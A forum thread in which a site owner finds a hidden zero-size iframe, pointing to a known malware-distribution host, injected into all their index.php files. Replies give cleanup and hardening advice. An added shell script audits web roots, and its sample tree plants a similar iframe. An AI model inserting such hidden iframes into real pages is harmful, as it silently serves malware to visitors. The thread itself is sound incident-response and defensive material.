Guys my site was doing perfectly fine until today when my browser started bringing up this error:
Warning: Something's Not Right Here!
www {dot} superheroalliance {dot} net contains content from pokosa.com, a site known to distribute malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified pokosa.com that we found malware on the site. For more about the problems found on pokosa.com, visit the Google Safe Browsing diagnostic page.
Please tell me how this can be resolved as it seems to be frightening away my members :'(
I don't know what has caused this but it sure as hell is making me sad. Kindly help me out with this someone.
So I did a view page source of my site and found this at the end:
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
The question is how do I remove it, as in, which file should I look into in order to remove this link?
Edited by K@ to add...
IF ANYONE'S CURIOUS AND WANTS TO CLICK ON THE LINK IN THIS POST... DON'T!
Check which files have been recently edited and go from there.
Fixed! Thanks Illori <3
Quote from: agent47 on February 07, 2012, 05:52:29 AM
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
How did this get there in the first place?
Quote from: floridaflatlander on February 07, 2012, 09:10:17 AM
How did this get there in the first place?
There are many ways. Brute-forcing of FTP or other credentials, exploit of a different software on the same account, exploit of a different site on the same server if the server is poorly-secured, server-level security breach, ...
It would be nice to know how this happened, so others can try to avoid the same situation.
Quote from: Xarcell on February 08, 2012, 04:13:07 PM
It would be nice to know how this happened, so others can try to avoid the same situation.
If I knew I would explain, mate, but only today did I discover that ALL my index.php files seem to be affected. It has basically appended the following line:
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
onto all of my index.php files, and I mean all, so now I have to manually remove them from each of the files :(
Wish I knew how this happened.
It isn't enough to just clean it up. The fact that it's been done proves that you are somehow vulnerable. It's important that you close the vulnerability by which they got in.
You should also check the .htaccess files in your account; they are another common target of malicious edits to try and slip by nasty stuff.
Think about all the other scripts you have installed, besides SMF, and check their versions. If any have new versions available, update them. You should also check through all .php scripts, not just index.php scripts. Look at their last modified times, or look for new files with strange names.
Also change all of your passwords. Wait with that one until you've fixed all the others that Roph mentioned, though, as the chance of this happening twice is quite big if you don't close the holes.
Looks like an iframe hack. Without a clear inventory of what is in the OP's web space (in relationship to other software) it is hard to tell how they got in.
Double check your directory permissions. Remember,
0644 For Files
0755 For Directories
Also make sure you're not running any unconfigured web based file editors.
Not all servers will have the files writable to the server with 644 and 755; you are best to contact your host, or even better, not have the files writable to the server unless you are installing mods.
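The checks suggested in the replies above (search every file for the hidden iframe, list recently modified .php and .htaccess files, compare permissions with 0644/0755) can be scripted. This is an added example, not code posted by anyone in the thread. The function names, the backup directory argument and the placeholder URL in the sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the thread: audit a web root after an iframe injection.
# Assumption: the injected tag is a zero-sized iframe like the one quoted above.
IFRAME_RE='<iframe[^>]*(width|height)="?0"?[ />][^>]*>[[:space:]]*</iframe>'

# Files (any extension) containing a zero-width or zero-height iframe.
find_hidden_iframes() {
    grep -rliE "$IFRAME_RE" "$1" 2>/dev/null | sort
}

# .php and .htaccess files modified within the last N days (default 7).
find_recent() {
    find "$1" -type f \( -name '*.php' -o -name '.htaccess' \) -mtime "-${2:-7}" | sort
}

# Files that are not 0644 and directories that are not 0755 (the values given
# in the thread; some hosts need different modes, so treat hits as questions).
find_odd_perms() {
    { find "$1" -type f ! -perm 644; find "$1" -type d ! -perm 755; } | sort
}

# Remove the tag from FILE. The infected copy goes to BACKUP_DIR, which should
# be outside the web root. sed matches case-sensitively, so re-run the scan after.
strip_hidden_iframes() {
    backup="$2/$(printf '%s' "$1" | tr '/' '_')"
    cp -p "$1" "$backup" && sed -E "s#$IFRAME_RE##g" "$backup" > "$1"
}

# Report only; nothing is changed.
audit_webroot() {
    echo "== hidden iframes ==";          find_hidden_iframes "$1"
    echo "== recently modified ==";       find_recent "$1" "${2:-7}"
    echo "== unexpected permissions ==";  find_odd_perms "$1"
}

# Constructed sample tree for trying the functions; the URL is a placeholder.
make_sample_tree() {
    root=$(mktemp -d) && mkdir -p "$root/forum" && chmod 755 "$root" "$root/forum"
    printf '<?php echo "ok"; ?>\n' > "$root/clean.php"
    printf '<?php echo "hi"; ?>\n<iframe src="http://malicious.example/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>\n' > "$root/forum/index.php"
    chmod 644 "$root/clean.php"; chmod 666 "$root/forum/index.php"
    touch -t 201001010000 "$root/clean.php"
    echo "$root"
}

# Usage: sh audit.sh /path/to/web/root [days]
if [ $# -gt 0 ]; then audit_webroot "$@"; fi
```

A clean scan only shows the symptom is gone; how the files were modified still has to be found and closed, as the replies above say.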